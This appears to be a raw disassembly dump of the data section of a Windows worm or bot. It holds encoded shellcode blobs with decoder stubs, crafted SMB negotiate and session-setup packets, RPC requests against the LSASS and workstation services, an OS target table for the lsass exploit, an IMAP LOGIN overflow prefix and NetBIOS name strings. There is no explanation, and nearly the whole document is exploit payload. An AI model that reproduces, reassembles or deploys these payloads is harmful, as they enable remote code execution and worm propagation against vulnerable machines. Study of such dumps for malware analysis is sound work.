dd 9A33E7CCh, 0E0B7BCC9h, 3E357381h, 805BCFD5h, 0B84FF7A6h
dd 611F2680h, 0EC613ED5h, 0C588C95Eh, 4225DA70h, 121DDC7Ah
dd 4222DC7Ah, 0BE1F5DD4h, 40B988F2h, 0EC1D5BD4h, 0C388BAD4h
dd 908BDAA0h, 0C588E9EFh, 7BA77279h, 4C7307DBh, 0ECA17278h
dd 13778DFBh, 2 dup(0)
dword_43E780 dd 2016280h, 100BDh, 8F160001h, 182h, 2 dup(0) ; DATA XREF: .text:0040CF45�o
byte_43E798 db 0EBh, 25h ; DATA XREF: .text:0040CFCE�o
word_43E79A dw 0FAE9h ; DATA XREF: .text:0040CFB4�o
dword_43E79C dd 0F677D399h, 596C0602h, 1DF8596Ch, 0D18CDE9Ch, 3D4704Ch
; DATA XREF: .text:0040CFC4�o
dd 53574658h, 32335F32h, 4C4C442Eh, 0E805EB01h, 0FFFFFFF9h
dd 2CED835Dh, 6459306Ah, 408B018Bh, 1C708B0Ch, 8788BADh
dd 8B3C5F8Dh, 8BFB011Bh, 0FB01785Bh, 11C4B8Bh, 24538BF9h
dd 5153FA01h, 205B8B52h, 0C931FB01h, 99C03141h, 18B348Bh
dd 0C231ACFEh, 0C084E2D1h, 0B60FF775h, 448D0945h, 39660845h
dd 66E17510h, 585A1031h, 5250565Eh, 41104E2Bh, 4A0CB70Fh
dd 188048Bh, 4DB60FF8h, 8D448909h, 94DFED8h, 4DFEBE75h
dd 0FE177408h, 5D8D244Dh, 0D0FF531Ah, 26AC789h, 9458858h
dd 0C794580h, 8B5082EBh, 93350445h, 89939393h, 8B660445h
dd 35660245h, 89669393h, 89580245h, 53DB31CEh, 56535353h
dd 0D0FF5646h, 5855C789h, 6A308966h, 0FF575510h, 458DE055h
dd 55FF5088h, 0FF5555E8h, 448DEC55h, 53940C05h, 78652E68h
dd 635C6865h, 3194646Dh, 0CC458DD2h, 57575794h, 0CAFE5353h
dd 9452F201h, 5078458Dh, 5088458Dh, 535308B1h, 0CEFE106Ah
dd 53535352h, 0F055FF55h, 55FFFF6Ah, 0E4h
aA01Login db 'a01 LOGIN "&',0 ; DATA XREF: .text:0040D243�o
align 4
dword_43E8E8 dd 0E983C92Bh, 0FFFFE8B8h, 5EC0FFFFh, 0E00E7681h, 837C1F1Ah
; DATA XREF: .text:0040D253�o
dd 0F4E2FCEEh, 31F4701Ch, 83E0E308h, 10947A1Fh, 39943EC4h
dd 796391DCh, 0F7F01B98h, 239402AFh, 35F41BC0h, 7D942E6Bh
dd 0E5DF2B0Eh, 8DF9E4Ch, 71D5DBE7h, 88F4D8E1h, 543B4EDBh
dd 2394FF95h, 1AF41BC4h, 0F754166Bh, 971E06BFh, 0F59436E3h
dd 1D033E8Ch, 18C42B23h, 0F72F596Bh, 0C9416A0h, 3C94B7FCh
dd 0F27744E8h, 2CF314AEh, 2F79CC1Fh, 4E2C7286h, 4E6C6D88h
dd 0ACE04EBFh, 80F2D188h, 0AAE04ADBh, 1AFA93BFh, 7E17F761h
dd 831D70B5h, 75C67230h, 8348B715h, 2F4C4936h, 3F4C59B3h
dd 14CFE5B3h
dword_43E9A0 dd 7D1F1A9Fh ; DATA XREF: .text:0040D210�o
db 86h, 72h
word_43E9A6 dw 0AE1Bh ; DATA XREF: .text:0040D222�o
dd 9D964986h, 85F37275h, 83487A4Ah, 2D0F7036h, 1ACFE5B5h
dd 14797E8Ah, 2C757783h, 0F5D333B9h, 0F55B7007h, 8FDF2B02h
dd 81968F4Ah, 8232581Eh, 69236A2h, 0D7B4B1D8h, 0CFE16888h
dd 546AE5F6h, 2B44CC1Fh, 2D4E4BB2h, 2D4E1B8Ah, 0ACE04BB5h
dd 79C6B788h, 0AAE0492Eh, 4BE0E58Ah, 9B77CA1Fh, 8366DC99h
dd 0AAE01E95h, 83E36D1Fh, 0F6EF7230h, 834C45E4h, 7CCFE536h
dd 0
dword_43EA24 dd 4EBh ; DATA XREF: .text:0040D2ED�o
; .text:0040D31F�o ...
dword_43EA28 dd 100102EBh, 0 ; DATA XREF: .text:0040D2FE�o
dword_43EA30 dd 100103BBh, 0 ; DATA XREF: .text:0040D330�o
dword_43EA38 dd 100108CBh, 0 ; DATA XREF: .text:0040D36B�o
dword_43EA40 dd 100102D9h, 0 ; DATA XREF: .text:0040D3A6�o
dword_43EA48 dd 1001031Bh, 0 ; DATA XREF: .text:0040D3D3�o
dword_43EA50 dd 10010269h, 0 ; DATA XREF: .text:0040D411�o
dword_43EA58 dd 10010296h, 0 ; DATA XREF: .text:0040D43E�o
dword_43EA60 dd 100102E2h, 0 ; DATA XREF: .text:0040D46B�o
dword_43EA68 dd 100102E2h, 0 ; DATA XREF: .text:0040D498�o
dword_43EA70 dd 100102E2h, 0 ; DATA XREF: .text:0040D4C5�o
dword_43EA78 dd 100102E2h, 0 ; DATA XREF: .text:0040D4F2�o
dword_43EA80 dd 10010302h, 0 ; DATA XREF: .text:0040D51F�o
dword_43EA88 dd 100249D4h, 0 ; DATA XREF: .text:0040D54C�o
dword_43EA90 dd 1001D9BBh, 0 ; DATA XREF: .text:0040D579�o
dword_43EA98 dd 100218E6h, 0 ; DATA XREF: .text:0040D5A6�o
dword_43EAA0 dd 10021782h, 0 ; DATA XREF: .text:0040D5D3�o
dword_43EAA8 dd 10021A51h, 0 ; DATA XREF: .text:0040D5FD�o
dword_43EAB0 dd 10021A51h, 0 ; DATA XREF: .text:0040D62B�o
dword_43EAB8 dd 10021A62h, 0 ; DATA XREF: .text:0040D781�o
dword_43EAC0 dd 335B0FEBh, 0E98366C9h, 553380E0h, 0EBFAE243h, 0FFECE805h
; DATA XREF: .text:0040D264�o
dd 0BB8CFFFFh, 0A171218Ch, 5F94D50Ch, 0AB98ABC5h, 15BCD598h
dd 0B4AAh
aWe0wn db '" "We0wn"',0Dh,0Ah,0 ; DATA XREF: .text:0040D278�o
; char aI_2[]
aI_2 db 'ë' ; DATA XREF: sub_40DDD9+181�o
; sub_40DDD9+23E�o
db 10h, 5Bh, 4Bh
dd 0B966C933h, 34800125h, 0FAE2990Bh, 0EBE805EBh, 70FFFFFFh
dd 99999962h, 0A938FDC6h, 12999999h, 0E91295D9h, 0F1123485h
dd 0F36E1291h, 271C09Dh, 7B999999h, 0ABAAF160h, 0EEF19999h
dd 0CDC6ABEAh, 71128F66h, 71C09DF3h, 9999991Bh, 7518607Bh
dd 99999809h, 9898F1CDh, 0CF669999h, 0C9C9C989h, 0D9C9D9C9h
dd 8DCF66C9h
db 12h, 41h, 0F1h
byte_43EB67 db 0E6h ; DATA XREF: sub_40DDD9+130�o
dd 0F1989999h
db 9Bh, 99h
word_43EB6E dw 4B9Dh ; DATA XREF: sub_40DDD9+120�o
dd 89F35512h, 0CF66CAC8h, 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh
dd 0CD751AA9h, 0F3BDA514h, 7B32C08Ch, 0BDDD5F64h, 0DD67DD89h
dd 0C510A4BDh, 0C510D1BDh, 0C510D5BDh, 0DD14C9BDh, 0C9CD89BDh
dd 0F3C8C8C8h, 66C8C898h, 66C8A9EFh, 55129DCFh, 0A86666F3h
dd 0CA91CF66h, 6685CF66h, 0CFC895CFh, 12A5DC12h, 9AE1B1CDh
dd 0EB12CB4Ch, 0AA6C9AB9h, 34D8D050h, 42AA5C9Ah, 0A3892796h
dd 5891ED4Fh, 439A9452h, 0A26872D9h, 0C37EEC86h, 9ABDC312h
dd 9512FF44h, 85C312D2h, 9D12449Ah, 325C9A12h, 715AC0C7h
dd 66666699h, 7597D717h, 8F2A67EBh, 579C4034h, 0F9795776h
dd 0A2657452h, 346C9040h, 0F9336075h, 0E05FE07Eh, 0
; char aI_1[]
aI_1 db 'ë' ; DATA XREF: sub_40D7FE+159�o
; sub_40D7FE+216�o
db 10h, 5Ah, 4Ah
dd 0B966C933h, 3480017Dh, 0FAE2990Ah, 0EBE805EBh, 70FFFFFFh
dd 99999895h, 0A938FDC3h, 12999999h, 0E91295D9h, 0D9123485h
dd 12411291h, 0ED12A5EAh, 6A9AE187h, 9AB9E712h, 8DD71262h
dd 0CECF74AAh, 9AA612C8h, 0F36B1262h, 3F6AC097h, 0C6C091EDh
dd 0DC9D5E1Ah, 0C6C0707Bh, 125412C7h, 5A9ABDDFh, 589A7848h
dd 12FF50AAh, 85DF1291h, 78585A9Ah, 12589A9Bh, 125A9A99h
dd 1A6E1263h, 4912975Fh, 71C09AF3h, 9999991Eh, 0CB945F1Ah
dd 65CE66CFh, 0F34112C3h, 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h
dd 669BF398h, 411275CEh, 999B9E5Eh
dword_43ECE8 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40D7FE+108�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_43EDD0 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:0040DCBD�o
; .text:0040E296�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002 db 'LM1.2X002',0
dw 4C02h
aAnman2_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12 db ' LM 0.12',0
align 10h
dword_43EE60 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0040DCE9�o
; .text:0040E2C2�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_43EF10 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0040DD10�o
; .text:0040E2E9�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_43EFF0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40D7FE+59�o
; sub_40DDD9+59�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_4: ; DATA XREF: sub_40D7FE+8B�o
; sub_40DDD9+8B�o
unicode 0, <C$>,0
a????? db '?????',0
dd 2 dup(0)
dword_43F058 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40D7FE+2AE�o
; sub_40DDD9+2D3�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_43F0C8 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40D7FE+2D5�o
; sub_40DDD9+2FE�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_43F170 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40D7FE+3B4�o
; sub_40DDD9+3E1�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_43F1F0 dd offset loc_401490+5 ; DATA XREF: sub_40D7FE+3E2�o
; sub_40DDD9+40F�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_407077+5
dd 1, 0
dd 1, 0
dd offset loc_407077+5
dd 1, 0
dd 1, 0
dd offset loc_407077+5
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_43F288 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40D7FE+30A�o
; sub_40DDD9+337�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_43F2F8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40D7FE+335�o
; sub_40DDD9+362�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_43F370 dd 0 ; DATA XREF: sub_40D7FE+363�o
; sub_40DDD9+390�o
dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 2 dup(0)
dword_43F3F8 dd 0AD9Dh ; DATA XREF: sub_40D7FE+EA�r
; sub_40D7FE+41E�r
dd 2 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 8
dword_43F438 dd 1004600h ; DATA XREF: sub_40D7FE+141�r
; sub_40D7FE+249�r ...
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
dword_43F4F0 dd 0EB5D03EBh, 0FFF8E805h, 0C58BFFFFh, 3311C083h, 0C9B966C9h
; DATA XREF: sub_40E3B2+118�o
dd 88308001h, 0DDFAE240h, 7C036403h, 88086409h, 0C4608888h
dd 1888889h, 0FE7774CEh, 0C606E074h, 0D9606486h, 1888889h
dd 0BBE04ECEh, 0E08888BAh, 0D7BAFBFFh, 4EDE77DCh, 7770CE01h
dd 25E074FEh, 60468D51h, 888889B8h, 775ACE01h, 0FAE074FEh
dd 609E3B76h, 888889A8h, 7746CE01h, 67E074FEh, 60E86846h
dd 88888998h, 7742CE01h, 43E070FEh, 60B37465h, 88888988h
dd 777CCE01h, 51E070FEh, 60257D81h, 88888878h, 7778CE01h
dd 2CE070FEh, 604FF892h, 88888868h, 7764CE01h, 2CE070FEh
dd 6061A625h, 88888858h, 7760CE01h, 6DE070FEh, 60C10EC1h
dd 88888848h, 776ACE01h, 6FE070FEh, 60F14EF1h, 88888838h
dd 0BB5ECE01h, 7C640977h, 0DC888889h, 888989E0h, 7CDE7788h
dd 0D8D8D8D8h, 0D8C8D8C8h, 378DE77h, 0E0DFDF50h, 6FAB888Ah
dd 9EE24403h, 0DE77DBD9h, 77DBDF64h, 77BB60DEh, 77DBD9DFh
dd 58036ADEh, 0E036CE01h, 88ECE5EBh, 0B4AEE01h, 0B405244Ch
dd 0BB48BBACh, 9D490841h, 4E756A23h, 0CC98ACCCh, 0B5ACCC76h
dd 0C0ACDC01h, 0C4ACDC01h, 0D8ACDC01h, 98ACCC05h, 0D9D9D8DCh
dd 0C1D9C9D9h, 0FE77D9D9h, 0DE77D94Ah, 0E2440346h, 77B97777h
dd 40035ADEh, 7736FE77h, 16635EDEh, 0DE9CDE77h, 88B829ECh
dd 0C8038888h, 94F80384h, 80C80325h, 888C4AD6h, 0DFDEDDDBh
dd 90ACE403h, 3B4CD03h, 8BF08DDCh, 90C2035Dh, 8BA8D203h
dd 0C1BA6B55h, 8B03BC03h, 7477BB7Dh, 0B22448BBh, 498FFC4Ch
dd 708B8547h, 0F4B37A63h, 69FD9CACh, 8BACD203h, 8403EE55h
dd 94D203C3h, 8C03558Bh, 634D8B03h, 348BB8Ah, 0D5D6D75Dh
dd 888C4AD3h, 0
dword_43F6D8 dd 280004h, 10h, 4 dup(0) ; DATA XREF: sub_40E3B2+7B�o
dd 5A7B91F8h, 11D0FF00h, 0C000B2A9h, 0FCE6B64Fh, 0FFFFFFFFh
dd 68736942h, 326B656Bh, 0FF333030h, 0
dd 1, 0
dd 0FFFF0000h, 0FFFFFFFFh, 0FFFFh, 0
dword_43F72C dd 7FFDF020h, 0 ; DATA XREF: sub_40E971+15A�o
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_40E971+A5�o
align 10h
dword_43F740 dd 10FF8h ; DATA XREF: sub_40E971+6F�o
dword_43F744 dd 10FF8h, 2 dup(0) ; DATA XREF: sub_40E971+36�o
dword_43F750 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_40ED91+7B�o
dd 13370000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002_0 db 'LM1.2X002',0
dw 4C02h
aAnman2_1_0 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12_0 db ' LM 0.12',0
align 4
dword_43F7D8 dd 0 ; DATA XREF: sub_40ED91+44�o
dd 800000D4h, 0
dword_43F7E4 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_40ED91+34�o
dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 3 dup(0)
unk_43F818 db 81h ; ; DATA XREF: sub_40EE6B+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 2 dup(0)
byte_43F868 db 41h ; DATA XREF: sub_40F47A+104�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 10h
aSvwfbA db 'SVWfì€',0 ; DATA XREF: .text:0040F753�o
aIcsa db '‰æèí',0
db 2 dup(0), 0FFh
dd 12096836h, 0F7E863D6h, 89000000h, 0A2E80846h, 0FF000000h
dd 6B680476h, 0E8CA2BD0h, 0E2h, 0E80C4689h, 3Fh, 680476FFh
dd 4C0297FAh, 0CDE8h, 68DB3100h, 410h, 89D0FF53h, 768B56C3h
dd 0B9C78910h, 410h, 315EA4F3h, 505050C0h, 0FF505053h
dd 468B0C56h, 0C4816608h, 5E5F0080h, 60E0FF5Bh, 23E8h
dd 24448B00h, 7C588D0Ch, 53C4383h, 284381h, 81000010h
dd 0F0002863h, 48BFFFFh, 14C48324h, 0C3C03150h, 0FF64D231h
dd 22896432h, 90B8DB31h, 31429042h, 8902B1C9h, 74AFF3DFh
dd 0F3EB4303h, 64107E89h, 6158028Fh, 20BF60C3h, 8B7FFDF0h
dd 8468B1Fh, 7F8B0789h, 78C781F8h, 89000001h, 741939F9h
dd 0EB098B04h, 39FA89F8h, 574045Ah, 0EB04528Bh, 891189F6h
dd 43C6044Ah, 0C36101FDh, 0FDF00CA1h, 1C408B7Fh, 8908588Bh
dd 8B008B1Eh, 46890840h, 8B60C304h, 8B28246Ch, 548B3C45h
dd 0EA017805h, 8B184A8Bh, 0EB01205Ah, 8B4938E3h, 0EE018B34h
dd 0C031FF31h, 0E038ACFCh, 0CFC10774h, 0EBC7010Dh, 247C3BF4h
dd 8BE17524h, 0EB01245Ah, 4B0C8B66h, 11C5A8Bh, 8B048BEBh
dd 4489E801h, 0C2611C24h, 0FEEB0008h, 0
dword_43FA18 dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
; DATA XREF: .text:0040F701�o
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
dword_43FAA8 dd 1000005h, 10h, 418h, 0 ; DATA XREF: .text:0040FC62�o
dd 400h, 90000h, 3 dup(1), 2 dup(3), 2, 7E4h, 0
dd 7E4h, 53004Fh, 3Ah
aPrivate: ; DATA XREF: .text:0040FC86�o
unicode 0, <\PRIVATE$\>,0
align 4
dword_43FB04 dd 5, 10h, 418h, 0 ; DATA XREF: .text:0040FC93�o
dd 400h, 90000h, 0
dword_43FB20 dd 2000005h, 10h, 404h, 0 ; DATA XREF: .text:0040FCBF�o
dd 3ECh, 90000h, 0
dword_43FB3C dd 909008EBh, 4014E9h, 2 dup(90909090h), 909008EBh, 4014E9h
; DATA XREF: .text:0040FCD2�o
dd 1AEB9090h, 6F684041h, 6F657375h, 62616466h, 41487375h
dd 909006EBh, 100124Dh, 90909090h, 9090h
dword_43FB78 dd 0E983C929h, 0D9EED9B0h, 5BF42474h, 19137381h, 833704F5h
; DATA XREF: .text:0040FD03�o
dd 0F4E2FCEBh, 7AEF9FE5h, 0C8FB0CF1h, 5B8F95E6h, 728FD13Dh
dd 32787E25h, 0BCEBF461h, 688FED56h, 7EEFF439h, 368FC192h
dd 0AEC4C4F7h, 43C471B5h, 3ACE341Eh, 0C3EF3718h, 1F20A122h
dd 688F106Ch, 51EFF43Dh, 0BC4FF992h, 0DC05E946h, 0BE8FD91Ah
dd 5618D175h, 53DFC4DAh, 0BC34B692h, 478FF959h, 778F5805h
dd 0B96CAB11h, 67E8FB57h, 646223E6h, 5379D7Fh, 5778271h
dd 0E7FBA146h, 0CBE93E71h, 0E1FBA522h, 51E17C46h, 350C1898h
dd 0C8069F4Ch, 3EDD9DC9h, 0C85358ECh, 6457A6CFh, 6447A64Ah
dd 0E7FBA65Ah
db 7Fh, 9Dh
word_43FC32 dw 551Ah ; DATA XREF: .text:0040FD0C�w
dd 0D68DA67Fh, 2DA09D8Ch, 0C8533269h, 66149FCFh, 5FD40A4Ch
dd 0DE2A58BDh, 64D20A4Eh, 5FD40A4Ch, 7E82BCFCh, 67D20A4Eh
dd 0C851A14Dh, 0D06C66C9h, 607D3360h, 0C85123E6h, 536E93C9h
dd 5A679D7Fh, 676E1090h, 0BEC8DC40h, 0BE409FFEh, 0C4C4C4FBh
dd 1A460BB3h, 0A428B7E7h, 9C3C8F94h, 456C5EB2h, 0C81246E7h
dd 0E1FBB16Ch, 6656A242h, 366EA448h, 6651A448h, 9A6C25E6h
dd 64CAF0C0h, 0C86E23E6h, 0E7FBC2E6h, 0B4F8A292h, 0E1FB91DDh
dd 5FD40A4Bh, 57E43BF6h, 0C8D20A4Ah, 3704F5C9h, 2 dup(0)
dword_43FCD8 dd 4A5A10EBh, 0B966C933h, 3480017Dh, 0FAE2990Ah, 0EBE805EBh
; DATA XREF: .text:004103D6�o
; .text:004104AF�o
dd 70FFFFFFh, 99999895h, 0A938FDC3h, 12999999h, 0E91295D9h
dd 0D9123485h, 12411291h, 0ED12A5EAh, 6A9AE187h, 9AB9E712h
dd 8DD71262h, 0CECF74AAh, 9AA612C8h, 0F36B1262h, 3F6AC097h
dd 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh, 125412C7h, 5A9ABDDFh
dd 589A7848h, 12FF50AAh, 85DF1291h, 78585A9Ah, 12589A9Bh
dd 125A9A99h, 1A6E1263h, 4912975Fh, 71C09AF3h, 9999991Eh
dd 0CB945F1Ah, 65CE66CFh, 0F34112C3h, 0ED71C09Ch, 0C9999999h
dd 0F3C9C9C9h, 669BF398h, 411275CEh, 999B9E5Eh
dword_43FD88 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: .text:00410305�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_43FE70 dd 600EBh ; DATA XREF: .text:00410460�o
dword_43FE74 dd 0FFF83FE9h, 0FFh ; DATA XREF: .text:00410393�o
off_43FE7C dd offset aOrhaus ; DATA XREF: .text:00410481�o
; "orhaus"
a2w:
unicode 0, <2w>,0
align 4
dword_43FE88 dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0 ; DATA XREF: .text:00410561�o
; .text:0041061D�o
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2
dword_43FED0 dd 3000005h, 10h, 0D20h, 1, 0D08h, 90000h, 419h, 0
; DATA XREF: .text:0041040E�o
dd 419h
dword_43FEF4 dd 3000005h, 10h, 1520h, 1, 1508h, 90000h, 819h, 0
; DATA XREF: .text:00410341�o
dd 819h
dword_43FF18 dd 0BAADh, 40000h, 0 ; DATA XREF: .text:00410442�o
dd 40000h, 430000h, 5C003Ah, 40000h, 0
dd 40000h, 430000h, 5C003Ah, 40000h, 0
dd 40000h, 430000h, 5C003Ah, 8080000h, 130079h, 0
dd 130000h, 640000h, 6D006Fh, 690061h, 2E006Eh, 610062h
dd 740073h, 720061h, 2E0074h, 65006Eh, 74h, 0BAADh, 8500000h
dd 0B0079h, 0
dd 0B0000h, 440000h, 4D004Fh, 490041h, 5C004Eh, 4C0042h
dd 41h, 6C68BAADh, 0F0B60013h, 24E563BBh, 5FD45F0Fh, 0DF7B4444h
dd 0DA1E42A2h, 0F84FBDC6h, 0CC7B2D6Dh, 0F6DAFABFh, 9957C071h
dd 410B1AEBh, 46F69CCBh, 2E0CCA98h, 0FEE65D4Fh, 0BCE2FD34h
dd 14772D1h, 0DDAFF5E1h, 276A0160h, 26F6C036h, 909C988Bh
dd 2383541Fh, 0FF78501Dh, 0BC6FC3A9h, 7AEDEAD6h, 0D33E15C9h
dd 18924307h, 84B743A3h, 99912670h, 6AFBAC10h, 0FAF6373Fh
dd 232A7A8h, 0C47B323Ah, 2F373822h, 0FBB32D08h, 0AB0316D8h
